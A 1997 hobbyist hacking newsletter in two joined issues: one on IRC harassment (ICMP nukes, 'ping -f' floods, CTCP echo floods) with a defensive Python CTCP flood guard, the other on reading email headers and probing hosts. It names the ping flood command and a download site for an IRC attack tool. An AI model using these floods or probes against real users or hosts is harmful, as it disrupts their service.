***********************
Newbie note: Any program that uses a resource is called a "client." Any program that offers a resource is a "server." Your IRC client program runs on either your home computer or shell account computer and connects you to an IRC server program which runs on a remote computer somewhere on the Internet.
***********************

You may already have an IRC server running on your ISP. Customer service at your ISP should be able to help you with instructions on how to use it.
Even easier yet, if your Web browser is set up to use Java, you can run IRC straight from your browser once you have surfed into a Web-based IRC server.

Where are good IRC servers for meeting other hackers?

There are several IRC servers that usually offer hacker channels.

EFNet (Eris-Free Network) links many IRC servers. It was originally started by the Eris FreeNet (ef.net). It is reputed to be a "war ground" where you might get a chance to really practice the IRC techniques we cover below.

Undernet is one of the largest networks of IRC servers. The main purpose of Undernet is to be a friendly place with IRC wars under control. But this means, yes, lots of IRC cops! The operators of these IRC servers have permission to kill you not only from a channel but also from a server. Heck, they can ban you for good. They can even ban your whole domain.

************************************
Newbie note: A domain is the last two (or sometimes three or four) parts of your email address. For example, aol.com is the domain name for America Online. If an IRC network were to ban the aol.com domain, that would mean every single person on America Online would be banned from it.
************************************

************************************
You can get punched in the nose warning: If the sysadmins at your ISP were to find out that you had managed to get their entire domain banned from an IRC net on account of committing ICMP bombing or whatever, they will be truly mad at you! You will be lucky if the worst that happens is that you lose your account. You'd better hope that word doesn't get out to all the IRC addicts on your ISP that you were the dude that got you guys all kicked out.
************************************

IRCNet is probably the same size if not larger than Undernet. IRCNet is basically the European/Australian split off from the old EFNet.

Yes, IRC is a world-wide phenomenon. Get on the right IRC network and you can be making friends with hackers on any continent of the planet. There are at least 80 IRC networks in existence. To learn how to contact them, surf over to: http://www.irchelp.org/. You can locate additional IRC servers by surfing over to http://hotbot.com or http://digital.altavista.com and searching for "IRC server."

Some IRC servers are ideal for the elite hacker, for example the l0pht server. Note that is a "zero" not an "O" in l0pht.

****************************************
Evil genius tip: Get on an IRC server by telneting straight in through port 6667 at the domain name for that server.
****************************************

But before you get too excited over trying out IRC, let us warn you. IRC is not so much phun any more because some d00dz aren't satisfied with using it to merely say naughty words and cast aspersions on people's ancestry and grooming habits. They get their laughs by kicking other people off IRC entirely. This is because they are too chicken to start brawls in bars. So they beat up on people in cyberspace where they don't have to fret over getting ouchies.

But we're going to show some simple, effective ways to keep these lusers from ruining your IRC sessions. However, first you'll need to know some of the ways you can get kicked off IRC by these bullies.

The simplest way to get in trouble is to accidentally give control of your IRC channel to an impostor whose goal is to kick you and your friends off. You see, the first person to start up a channel on an IRC server is automatically the operator (OP). The operator has the power to kick people off or invite people in. Also, if the operator wants to, he or she may pass operator status on to someone else. Ideally, when you leave the channel you would pass this status on to a friend you trust. Also, maybe someone who you think is your good buddy is begging you to please, please give him a turn being the operator.
You may decide to hand over the OP to him or her in order to demonstrate friendship. But if you mess up and accidentally OP a bad guy who is pretending to be someone you know and trust, your fun chat can become history. One way to keep this all this obnoxious stuff from happening is to simply not OP people you do not know. But this is easier said than done. It is a friendly thing to give OP to your buddies. You may not want to appear stuck up by refusing to OP anyone. So if you are going to OP a friend, how can you really tell that IRC dude is your friend? Just because you recognize the nick (nickname), don't assume it's who you think it is! Check the host address associated with the nick by giving the command "/whois IRCnick" where "IRCnick" is the nickname of the person you want to check. This "/whois" command will give back to you the email address belonging to the person using that nick. If you see, for example, "d***@wannabe.net" instead of the address you expected, say friend@cool.com, then DO NOT OP him. Make the person explain who he or she is and why the email address is different. But entering a fake nick when entering an IRC server is only the simplest of ways someone can sabotage an IRC session. Your real trouble comes when people deploy "nukes" and "ICBMs" against you. "Nuking" is also known as "ICMP Bombing." This includes forged messages such as EOF (end of file), dead socket, redirect, etc. ************************************** Newbie note: ICMP stands for Internet Control Message Protocol. This is an class of IRC attacks that go beyond exploiting quirks in the IRC server program to take advantage of major league hacking techniques based upon the way the Internet works. ************************************** ************************************** You can go to jail warning: ICMP attacks constitute illegal denial of service attacks. 
They are not just harmless harassment of a single person on IRC, but may affect an entire Internet host computer, disrupting service to all who are using it.
***************************************

For example, ICMP redirect messages are used by routers to tell other computers "Hey, quit sending me that stuff. Send it to routerx.foobar.net instead!" So a forged ICMP redirect could cause your IRC traffic to go to bit heaven instead of your chat channel. (A host is only supposed to honor a redirect that comes from the gateway it is already using, and most systems can be configured to ignore redirects altogether; that is the defense.) EOF stands for "end of file." "Dead socket" refers to connections such as the PPP session you would be using with many IRC clients to connect to the Internet. If your IRC enemy spoofs a message saying your host is unreachable, your IRC chat session can't get any more input from you. That's what the program "ICMP Host Unreachable Bomber for Windows" does.

Probably the most devastating IRC weapon is the flood ping, known as "ICBM flood" or "ICMPing." The idea is that a bully will find out what Internet host you are using, and then run "ping -f" against your host computer. Or even against your home computer. Yes, on IRC it is possible to identify the dynamically assigned IP address of your home computer and send stuff directly to your modem! If the bully has a decent computer and a faster connection than yours, he or she may be able to ping yours badly enough to briefly knock you out of IRC. Then, with your nick freed up, this character can grab it and masquerade as you.

**********************
Newbie note: When you connect to the Internet with a point-to-point (PPP) connection, your ISP's host computer assigns you an Internet Protocol (IP) address which may be different every time you log on. This is called a "dynamically assigned IP address." In some cases, however, the ISP has arranged to assign the user the same IP address each time.
**********************

Now let's consider in more detail the various types of flooding attacks on IRC.
The purpose of flooding is to send so much garbage to a client that its connection to the IRC server either becomes useless or gets cut off.

Text flooding is the simplest attack. For example, you could just hold down the "x" key and hit enter from time to time. This would keep the IRC screen filled with your junk and scroll the others' comments quickly off the screen. However, text flooding is almost always unsuccessful because almost any IRC client (the program you run on your computer) has text flood control. Even if it doesn't, text must pass through an IRC server. Most IRC servers also have text flood filters. Because text flooding is basically harmless, you are unlikely to suffer anything worse than getting banned or possibly K:lined for doing it.

******************************************
Newbie note: A "K:line" is a ban written into the IRC server's configuration against a user@host mask. The mask can be as narrow as one person, but server operators often make it broad enough to cover a whole domain. For example, if you are a student at Giant State University with an address of IRCd00d@giantstate.edu and the server K:lines *@*.giantstate.edu, then every person connecting from giantstate.edu will be banned along with you.
*******************************************

Client to Client Protocol (CTCP) echo flooding is the most effective type of flood. CTCP ECHO is sort of like the ping you send to determine whether a host computer is alive. It is a command used within IRC to check whether someone is still on your IRC channel. How does the echo command work? To check whether someone is still there, give the command "/ctcp nick ECHO hello out there!" If "nick" (where "nick" is the IRC nickname of the person you are checking out) is still there, you get back "nick HELLO OUT THERE." What has happened is that your victim's IRC client program has automatically echoed whatever message you sent. But someone who wants to boot you off IRC can use the CTCP echo command to trick your IRC server into thinking you are hogging the channel with too much talking.
This is because most IRC servers will automatically cut you off if you try text flooding. So CTCP echo flooding tricks the server into falsely cutting someone off by making the victim's IRC client automatically answer a whole bunch of echo requests: every automatic reply is a message the victim is sending, and the server counts it against the victim's flood limit just as if the victim had typed it. Of course your attacker could also get booted off for making all those CTCP echo requests. But a knowledgeable attacker will either be working in league with some friends who will be doing the same thing to you, or else be connected with several different nicks to that same IRC server. So by having different versions of him or herself in the form of software bots making those CTCP echo requests, the attacker stays on while the victim gets booted off. This attack is also fairly harmless, so people who get caught doing this will only get banned or maybe K:lined for their misbehavior.

******************************
Newbie note: A "bot" is a computer program that acts kind of like a robot to go around and do things for you. Some bots are hard to tell from real people. For example, some IRC bots wait for someone to use bad language and respond to these naughty words in annoying ways.
*************************************

*************************************
You can get punched in the nose warning: Bots are not permitted on the servers of the large networks. The IRC cops who control hacker wars on these networks love nothing more than killing bots and banning the botrunners they catch.
**************************************

A similar attack is CTCP ping. You can give the command "/ping nick" and the IRC client of the guy using that nick would respond, by way of the IRC server, with a message back to the person who made the request saying "nick" is alive, and telling you how long it took for nick's IRC client program to respond. (The reply comes back as a NOTICE, and a well-behaved client never answers a NOTICE automatically; if it did, two clients could flood each other forever.)
It's useful to know the response time because sometimes the Internet can be so slow it might take ten seconds or more to send an IRC message to other people on that IRC channel. So if someone seems to be taking a long time to reply to you, it may just be a slow Internet. But a flood of CTCP pings does to you exactly what a flood of CTCP echoes does: your client answers every one, and the server cuts you off for talking too much. Your attacker can also easily get the dynamically assigned IP (Internet protocol) address of your home computer and directly flood your modem. But just about every Unix IRC program has at least some CTCP flood protection in it. Again, we are looking at a fairly harmless kind of attack.

So how do you handle IRC attacks? There are several programs that you can run with your Unix IRC program. Examples are the programs LiCe and Phoenix. These scripts will run in the background of your Unix IRC session and will automatically kick in some sort of protection (ignore, ban, kick) against attackers.

If you are running a Windows-based IRC client, you may assume that like usual you are out of luck. In fact, when I first got on an IRC channel recently using Netscape 3.01 running on Win 95, the *first* thing the denizens of #hackers did was make fun of my operating system. Yeah, thanks. But in fact there are great IRC war programs for both Windows 95 and Unix.

For Windows 95 you may wish to use the mIRC client program. You can download it from http://www.super-highway.net/users/govil/mirc40.html. It includes protection from ICMP ping flood. But this program isn't enough to handle all the IRC wars you may encounter. So you may wish to add the protection of the most user-friendly, powerful Windows 95 war script around: 7th Sphere. You can get it from http://www.localnet.com/~marcraz/.

If you surf IRC from a Unix box, you'll want to try out IRCII. You can download it from ftp.undernet.org, in the directory /pub/irc/clients/unix, or http://www.irchelp.org/, or ftp://cs-ftp.bu.edu/irc/. For added protection, you may download LiCe from ftp://ftp.cibola.net/pub/irc/scripts.
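To show what such a protection script actually does, here is an added example, written for this edition and not code from LiCe, Phoenix, 7th Sphere or mIRC. It is a client-side CTCP flood guard in Python. It assumes raw IRC lines in the RFC 1459 form ":nick!user@host PRIVMSG target :^ACMD arg^A" (the ^A is the \x01 byte that marks a CTCP request); the CtcpFloodGuard class, its limits and the sample session are all made up for illustration. The point it makes that the text above only hints at: budget the replies by host, not by nick, or a botrunner with several nicks on one machine gets a fresh budget for each.

```python
import re
import time
from collections import defaultdict, deque

# Added example: a client-side CTCP flood guard. Not code from any of the
# war scripts named in the Guide; the class, its limits and the sample lines
# below are constructed for illustration.

# A CTCP request arrives as a PRIVMSG whose text is wrapped in \x01 bytes:
#   :evil!d00d@wannabe.net PRIVMSG mynick :\x01ECHO hello out there!\x01
CTCP_LINE = re.compile(
    r'^:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+) PRIVMSG \S+ '
    r':\x01(?P<cmd>[A-Z]+)(?: (?P<arg>[^\x01]*))?\x01\s*$'
)


class CtcpFloodGuard:
    """Decide whether to answer a CTCP request.

    Budgets are keyed on the sender's host rather than the nick, because an
    attacker who runs several nicks or bots from one host would otherwise get
    a fresh budget for each of them.  A global budget covers several hosts
    flooding in concert.  Anything over budget is dropped without a reply, so
    the server never sees the victim "talk" on the attacker's behalf.
    """

    def __init__(self, per_host=3, global_limit=10, window=10.0, ignore_for=120.0):
        self.per_host = per_host          # requests one host may make per window
        self.global_limit = global_limit  # requests from everyone per window
        self.window = window              # seconds
        self.ignore_for = ignore_for      # seconds a flooding host stays ignored
        self.recent = defaultdict(deque)  # host -> timestamps of recent requests
        self.recent_all = deque()         # timestamps of all recent requests
        self.ignored = {}                 # host -> time until which it is ignored

    def _prune(self, q, now):
        while q and now - q[0] > self.window:
            q.popleft()

    def handle(self, line, now=None):
        """Return ('pass', None) for non-CTCP traffic, ('reply', text) when
        the request may be answered, or ('drop', reason) when it must not."""
        now = time.time() if now is None else now
        m = CTCP_LINE.match(line)
        if not m:
            return ('pass', None)
        nick, host, cmd, arg = m['nick'], m['host'], m['cmd'], m['arg'] or ''

        until = self.ignored.get(host)
        if until is not None:
            if now < until:
                return ('drop', 'host %s is ignored' % host)
            del self.ignored[host]

        q = self.recent[host]
        self._prune(q, now)
        self._prune(self.recent_all, now)
        q.append(now)
        self.recent_all.append(now)

        if len(q) > self.per_host:
            self.ignored[host] = now + self.ignore_for
            return ('drop', 'CTCP flood from %s, ignoring it' % host)
        if len(self.recent_all) > self.global_limit:
            return ('drop', 'global CTCP flood')

        # Replies go out as NOTICE so that the other side's client, which must
        # never auto-answer a NOTICE, cannot bounce them back into a loop.
        if cmd in ('PING', 'ECHO'):
            return ('reply', 'NOTICE %s :\x01%s\x01' % (nick, ('%s %s' % (cmd, arg)).strip()))
        if cmd == 'VERSION':
            return ('reply', 'NOTICE %s :\x01VERSION example-client 0.1\x01' % nick)
        return ('drop', 'unsupported CTCP %s' % cmd)


def run(lines, guard=None):
    """Feed (timestamp, raw line) pairs through a guard; return the actions."""
    guard = guard or CtcpFloodGuard()
    return [guard.handle(line, now=ts)[0] for ts, line in lines]


# Constructed session: one honest ping, then six ECHO requests from two nicks
# that share a host, which is how a botrunner tries to dodge per-nick limits.
SAMPLE = [
    (0.0, ':friend!f@cool.com PRIVMSG me :\x01PING 1\x01'),
    (1.0, ':evil1!d@wannabe.net PRIVMSG me :\x01ECHO x\x01'),
    (1.1, ':evil1!d@wannabe.net PRIVMSG me :\x01ECHO x\x01'),
    (1.2, ':evil1!d@wannabe.net PRIVMSG me :\x01ECHO x\x01'),
    (1.3, ':evil2!d@wannabe.net PRIVMSG me :\x01ECHO x\x01'),
    (1.4, ':evil2!d@wannabe.net PRIVMSG me :\x01ECHO x\x01'),
    (1.5, ':evil2!d@wannabe.net PRIVMSG me :\x01ECHO x\x01'),
    (2.0, ':someone!s@other.net PRIVMSG #chan :hello'),
]

if __name__ == '__main__':
    for (ts, line), action in zip(SAMPLE, run(SAMPLE)):
        print('%4.1f %-6s %s' % (ts, action, line.replace('\x01', '^A')))
```

Run it and the honest ping and the first three echoes get answered; the fourth request from wannabe.net, even though it comes from a different nick, pushes that host over its budget and it is ignored for two minutes. A real script would plug `handle` into the client's incoming-line hook and send back the text of a 'reply'.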
Ahem, at that same site, ftp.cibola.net, you can also download the attack program Tick from /pub/irc/tick. But if you get Tick, just remember our "You can get punched in the nose" warning!

*********************************
Newbie note: For detailed instructions on how to run these IRC programs, see http://www.irchelp.org/. Or go to Usenet and check out alt.irc.questions
*********************************

*********************************
Evil genius tip: Want to know every excruciating technical detail about IRC? Check out RFC 1459 (The IRC protocol). You can find many copies of this ever popular RFC (Request for Comments) by doing a Web search.
********************************

Now let's suppose you are all set up with an industrial strength IRC client program and war scripts. Does this mean you are ready to go to war on IRC? We Happy Hacker folks don't recommend attacking people who take over op status by force on IRC. Even if the other guys start it, remember this. If they were able to sneak into the channel and get ops just like that, then chances are they are much more experienced and dangerous than you are. Until you become an IRC master yourself, we suggest you do no more than ask politely for ops back. Better yet, "/ignore nick" the l00zer and join another channel. For instance, if #evilhaxorchat is taken over, just create #evilhaxorchat2 and "/invite IRCfriend" all your friends there. And remember to use what you learned in this Guide about the IRC whois command so that you DON'T op people unless you know who they are.

As Patrick Rutledge says, this might sound like a wimp move, but if you don't have a fighting chance, don't try - it might be more embarrassing for you in the long run. And if you start IRC warring and get K:lined off the system, just think about that purple nose and black eye you could get when all the other IRC dudes at your ISP or school find out who was the luser who got everyone banned.

That's it for now. Now don't try any funny stuff, OK?
Oh, no, they're nuking meee... ____________________________________________________________ Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe" Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking! Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. ________________________________________________________ ___________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol 3 Number 4 How to Read Email Headers and Find Internet Hosts Warning: flamebait enclosed! ____________________________________________________________ OK, OK, you 31337 haxors win. I'm finally releasing the next in our series of Guides oriented toward the intermediate hacker. Now some of you may think that headers are too simple or boring to waste time on. However, a few weeks ago I asked the 3000+ readers of the Happy Hacker list if anyone could tell me exactly what email tricks I was playing in the process of mailing out the Digests. But not one person replied with a complete answer -- or even 75% of the answer -- or even suspected that for months almost all Happy Hacker mailings have doubled as protests. The targets: ISPs offering download sites for email bomber programs. Conclusion: it is time to talk headers! 
In this Guide we will learn:

· what is a header
· why headers are fun
· how to see full headers
· what all that stuff in your headers means
· how to get the names of Internet host computers from your headers
· the foundation for understanding the forging of email and Usenet posts, catching the people who forge headers, and the theory behind those email bomber programs that can bring an entire Internet Service Provider (ISP) to its knees

This is a Guide you can make at least some use of without getting a shell account or installing some form of Unix on your home computer. All you need is to be able to send and receive email, and you are in business. However, if you do have a shell account, you can do much more with deciphering headers. Viva Unix!

Headers may sound like a boring topic. Heck, the Eudora email program named the button you click to read full headers "blah blah blah." But all those guys who tell you headers are boring are either ignorant -- or else afraid you'll open a wonderful chest full of hacker insights. Yes, every email header you check out has the potential to unearth a treasure hidden in some back alley of the Internet.

Now headers may seem simple enough to be a topic for one of our Beginners' Series Guides. But when I went to look up the topic of headers in my library of manuals, I was shocked to find that most of them don't even cover the topic. The two I found that did cover headers said almost nothing about them. Even the relevant RFC 822 is pretty vague. If any of you super-vigilant readers looking for flame bait happen to know of any literature that *does* cover headers in detail, please include that information in your tirades!

*********************************************
Technical tip: Information relevant to headers may be extracted from Requests for Comments (RFCs) 822 (best), as well as 1042, 1123, 1521 and 1891 (not a complete list). To read them, take your Web browser to http://altavista.digital.com and search for "RFC 822" etc.
*********************************************

Lacking much help from manuals, and finding that RFC 822 didn't answer all my questions, the main way I researched this article was to send email back and forth among some of my accounts, trying out many variations in order to see what kinds of headers they generated. Hey, that's how real hackers are supposed to figure out stuff when RTFM (read the fine manual) or RTFRFC (read the fine RFC) doesn't tell us as much as we want to know. Right?

One last thing. People have pointed out to me that every time I put an email address or domain name in a Guide to (mostly) Harmless Hacking, a zillion newbies launch botched hacking attacks against these. All email addresses and domain names below have been fubarred.

************************************************
Newbie note: The verb "to fubar" means to obscure email addresses and Internet host addresses by changing them. Ancient tradition holds that it is best to do so by substituting "foobar" or "fubar" for part of the address.
************************************************

WHAT ARE HEADERS?

If you are new to hacking, the headers you are used to seeing may be incomplete.
Chances are that when you get email it looks something like this:

From: Vegbar Fubar
Date: Fri, 11 Apr 1997 18:09:53 GMT
To: hacker@techbroker.com

But if you know the right command, suddenly, with this same email message, we are looking at tons and tons of stuff:

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI) for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400
Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400
Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4) id for ; Fri, 11 Apr 1997 20:09:56 +0200
From: Vegbar Fubar
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT
Date: Fri, 11 Apr 1997 18:09:53 GMT
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>
To: hacker@techbroker.com

Hey, have you ever wondered why all that stuff is there and what it means? We'll return to this example later in this tutorial. But first we must consider the burning question of the day:

WHY ARE HEADERS FUN?

Why bother with those "blah blah blah" headers? They are boring, right? Wrong!

1) Ever hear a wannabe hacker complaining he or she doesn't have the addresses of any good computers to explore? Have you ever used one of those IP scanner programs that find valid Internet Protocol addresses of Internet hosts for you? Well, you can find gazillions of valid addresses without the crutch of one of these programs simply by reading the headers of emails.

2) Ever wonder who really mailed that "Make Money Fast" spam? Or who is that klutz who email bombed you? The first step to learning how to spot email forgeries and spot the culprit is to be able to read headers.

3) Want to learn how to convincingly forge email? Do you aspire to write automatic spam or email bomber programs?
(I disapprove of spammer and email bomb programs, but let's be honest about the kinds of knowledge their creators must draw upon.) The first step is to understand headers.

4) Want to attack someone's computer? Find out where best to attack from the headers of their email. I disapprove of this use, too. But I'm dedicated to telling you the truth about hacking, so like it or not, here it is.

HOW CAN YOU SEE FULL HEADERS?

So you look at the headers of your email and it doesn't appear to have any good stuff whatsoever. Want to see all the hidden stuff? The way you do this depends on what email program you are using.

The most popular email program today is Eudora. To see full headers in Eudora, just click the "blah, blah, blah" button on the far left end of the tool bar.

The Netscape web browser includes an email reader. To see full headers, click on Options, then click the "Show All Headers" item.

Sorry, I haven't looked into how to do that with Internet Explorer. Oh, no, I can see the flames coming, how dare I not learn the ins and outs of IE mail! But, seriously, IE is a dangerously insecure Web browser because it is actually a Windows shell. So no matter how often Microsoft patches its security flaws, chances are you will be hurt by it one of these days. Just say "no" to IE.

Another popular email program is Pegasus. Maybe there is an easy way to see full headers in Pegasus, but I haven't found it. The hard way to see full headers in Pegasus -- or IE -- or any email program -- is to open your mail folders with Wordpad. It is included in the Windows 95 operating system and is the best Windows editing program I have found for handling documents with lots of embedded control characters and other oddities.

The Compuserve 3.01 email program automatically shows full headers. Bravo, Compuserve!

Pine is the most popular email program used with Unix shell accounts.
Since in order to be a real hacker you will sooner or later be using Unix, now may be a great time to start using Pine. ************************************************* Newbie note: Pine stands for Pine Is Not Elm, a tribute to the really, truly ancient Elm email program (which is still in use). Both Pine and Elm date back to ARPAnet, the US Defense Advanced Research Projects Agency computer network that eventually mutated into today's Internet. OK, OK, that was a joke. According to the official blurb, "PINE is the University of Washington's 'Program for Internet News and Email'." ************************************************* If you have never used Pine before, you may find it isn't as easy to use as those glitzy Windows email programs. But aside from its amazing powers, there is a really good reason to learn to compose email in Pine: you get practice using pico editor commands. If you want to be a real hacker, you will be using the pico editor (or another editor that uses similar commands) someday when you are writing programs in a Unix shell. To bring up Pine, at the cursor in your Unix shell simply type in "pine." In Pine, while viewing an email message, you may be able to see full headers by simply hitting the "h" key. If this doesn't work, you will have to go into the Setup menu to enable this command. To do this, go to the main menu and give the command "s" for Setup. Then in the Setup menu choose "c" for Config. 
On the second page of the Config menu you will see something like this:

 PINE 3.91   SETUP CONFIGURATION             Folder: INBOX  2 Messages

 [ ]  compose-rejects-unqualified-addrs
 [ ]  compose-sets-newsgroup-without-confirm
 [ ]  delete-skips-deleted
 [ ]  enable-aggregate-command-set
 [ ]  enable-alternate-editor-cmd
 [ ]  enable-alternate-editor-implicitly
 [ ]  enable-bounce-cmd
 [ ]  enable-flag-cmd
 [X]  enable-full-header-cmd
 [ ]  enable-incoming-folders
 [ ]  enable-jump-shortcut
 [ ]  enable-mail-check-cue
 [ ]  enable-suspend
 [ ]  enable-tab-completion
 [ ]  enable-unix-pipe-cmd
 [ ]  expanded-view-of-addressbooks
 [ ]  expanded-view-of-folders
 [ ]  expunge-without-confirm
 [ ]  include-attachments-in-reply

 ? Help       E Exit Config  P Prev       - PrevPage   X [Set/Unset]
              N Next        Spc NextPage  W WhereIs

You first highlight the line that says "enable-full-header-cmd" and then press the "x" key. Then give "e" to exit, saving the change. Once you have done this, when you are reading your email you will be able to see full headers by giving the "h" command.

Elm is another Unix email reading program. It actually gives slightly more detailed headers than Pine, and automatically shows full headers.

WHAT DOES ALL THAT STUFF IN YOUR HEADERS MEAN?

We'll start by taking a look at a mildly interesting full header. Then we'll examine two headers that reveal some interesting shenanigans. Finally we will look at a forged header.

OK, let us return to that fairly ordinary full header we looked at above. We will decipher it piece by piece. First we look at the simple version:

From: Vegbar Fubar
Date: Fri, 11 Apr 1997 18:09:53 GMT
To: hacker@techbroker.com

The information within any header consists of a series of fields separated from each other by a "newline" character. Each field consists of two parts: a field name, which includes no spaces and is terminated by a colon; and the contents of the field. In this case the only fields that show are "From:," "Date:," and "To:".
In every full header there are two kinds of information: the fields that say who the message is from and to, and a trail of everything that happened to it along the way. (Strictly speaking, the "envelope" is something else again: it is the sender and recipient given in the SMTP transaction itself, the MAIL FROM and RCPT TO commands, and it is not part of the header at all. The From: and To: header fields need not match the envelope, which is exactly what makes forged email possible.) In the short version the only field that tells us anything about the handling of the message is the Date field. When we expand to a full header, we are able to see all the fields of the header. We will now go through this information line by line.

Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI) for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400

This line tells us that the mail program on a computer named o200.fooway.net accepted this email for delivery to my account techbr@fooway.net, which is also the POP server I download it from. Note that it was the mail transfer program on o200.fooway.net that stamped this line when the message arrived, not the act of downloading. Each host that handles a message adds its own Received: line at the top, so you read them from the bottom up to follow the route the message took, and the topmost one is the last hop. The (950413.SGI.8.6.12/951211.SGI) part identifies the software name and version of the mail program on that host.

********************************************
Newbie note: POP stands for Post Office Protocol. Your POP server is the computer that holds your email until you want to read it. Usually the email program on your home computer or shell account computer will connect to port 110 on your POP server to get your email. A similar, but more general protocol is IMAP, for Internet Message Access Protocol. Trust me, you will be a big hit at parties if you can hold forth on the differences between POP and IMAP, you big hunk of a hacker, you! (Hint: for more info, RTFRFCs.)
********************************************

Now we examine the second line of the header:

Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400

Well, gee, I didn't promise that this header would be *totally* ordinary. This line tells us that a computer named ifi.foobar.no passed this email to o200.fooway.net for someone with the email address of hacker@techbroker.com.
This is because I am piping all email to hacker@techbroker.com into the account techbr@fooway.net. Under Unix this is done by setting up a file in your home directory named ".forward" with the address to which you want your email sent. Now there is a lot more behind this, but I'm not telling you. Heh, heh. Can any of you evil geniuses out there figure out the whole story?

"ESMTP" stands for "extended simple mail transfer protocol." The "950413.SGI.8.6.12/951211.SGI" designates the version of the program that is handling my email. Now for the next line in the header:

Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4) id for ; Fri, 11 Apr 1997 20:09:56 +0200

This line tells us that the computer ifi.foobar.no got this email message from the computer gyllir.ifi.foobar.no. These two computers appear to be on the same LAN. In fact, note something interesting. The computer name gyllir.ifi.foobar.no has a number after it, 129.xxx.64.230. This is its numerical IP address. (I substituted ".xxx." for three numbers in order to fubar the IP address.) But the computer ifi.foobar.no didn't have a number after its name. How come? (Each Received: line is written by the host named after "by", and it records the address of the machine that connected to it, never its own. ifi.foobar.no's address would only show up on the next line, where it is the "from" host, and o200.fooway.net didn't bother to record it.)

Now if you are working with Windows 95 or a Mac you probably can't look this up as easily. But trust me, hacking is all about noticing these little mysteries and probing them (until you find something to break, muhahaha -- only kidding, OK?) But since I am trying to be a real hacker, I go to my trusty Unix shell account and give the command:

>nslookup ifi.foobar.no
Server: Fubarino.com
Address: 198.6.71.10

Non-authoritative answer:
Name: ifi.foobar.no
Address: 129.xxx.64.2

Notice the different numerical IP addresses between ifi.foobar.no and gyllir.ifi.foobar.no. Hmmm, I begin to think that the domain ifi.foobar.no may be a pretty big deal. Probing around with dig and traceroute leads me to discover lots more computers in that domain.
Probing with nslookup in the mode "set type=any" tells me yet more. Say, what does that ".no" mean, anyhow? A quick look at the ISO 3166 list of country codes from the International Organization for Standardization tells me "no" stands for Norway. Aha, it looks like Norway is an arctic land of fjords, mountains, reindeer, and lots and lots of Internet hosts. A quick search of the mailing list for Happy Hacker reveals that some 5% of its almost 4,000 email addresses have the .no domain. So now we know that this land of the midnight sun is also a hotbed of hackers! Who said headers are boring?

On to the next lines, which have the name of the sender and the first hop the message took:

From: Vegbar Fubar
Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT

I'm going to do some guessing here. This line says the computer gyllir.ifi.foobar.no got this email message from Vegbar Fubar on the computer "localhost." Now "localhost" is what a Unix computer calls itself. While in a Unix shell, try the command "telnet localhost." You'll get a login sequence that gets you right back into your own account. So when I see that gyllir.ifi.foobar.no got the email message from "localhost" I assume that means the sender of this email was logged into a shell account on gyllir.ifi.foobar.no, and that this computer runs Unix. I quickly test this hypothesis:

> telnet gyllir.ifi.foobar.no
Trying 129.xxx.64.230...
Connected to gyllir.ifi.foobar.no.
Escape character is '^]'.

IRIX System V.4 (gyllir.ifi.foobar.no)

Now Irix is a Unix-type operating system for Silicon Graphics Inc. (SGI) machines. This fits with the version string of the mail software on ifi.foobar.no in the header, (950413.SGI.8.6.12/951211.SGI). So, wow, we are looking at a large network of Norwegian computers that includes SGI boxes. We could find out just how many SGI boxes with patience, scanning of neighboring IP addresses, and use of the Unix dig and nslookup commands.
Now you don't see SGI boxes just every day on the Internet. SGI computers are optimized for graphics and scientific computing. So I'm really tempted to learn more about this domain. Oftentimes an ISP will have a Web page that is found by directing your browser to its domain name. So I try out http://ifi.foobar.no. It doesn't work, so I try http://www.ifi.foobar.no. I get the home page for the University of Oslo Institutt for Informatikk. The Informatikk division has strengths in computer science and image processing. No wonder people with ifi.foobar.no get to use SGI computers. Next I check out www.foobar.no and learn the University of Oslo has some 39,000 students. No wonder we find so many Internet host computers under the ifi.foobar.no domain!

But let's get back to this header. The next line is pretty simple, just the date:

Date: Fri, 11 Apr 1997 18:09:53 GMT

But now comes the most fascinating line of all in the header, the message ID:

Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>

The message ID is the key to tracking down forged email. Avoiding the creation of a valid message ID is the key to using email for criminal purposes. Computer criminals go to a great deal of effort to find Internet hosts on which to forge email that will leave no trace of their activities through these message IDs.

The first part of this ID is the date and time. 199704111809 means 1997, April 11, 18:09 (or 6:09 PM), which matches the Date line to the minute. Some message IDs also include the time in seconds. Others may leave out the "19" from the year. The 13156 is a number the mail program on the sending host assigned to the message (typically the process or queue ID of the mailer that handled it), and gyllir@ifi.foobar.no refers to the computer, gyllir within the domain ifi.foobar.no, that made up the ID and on which the log entry tying that number to the sender is stored. Where on this computer are the records of the identities of senders of email stored? Now Unix has many variants, so I'm not going to promise these records will be in a file of the same name in every Unix box. But often they will be in the mail log that the mailer writes through syslog, or in the mail queue directory, /var/spool/mqueue (or /usr/spool/mqueue on older systems).
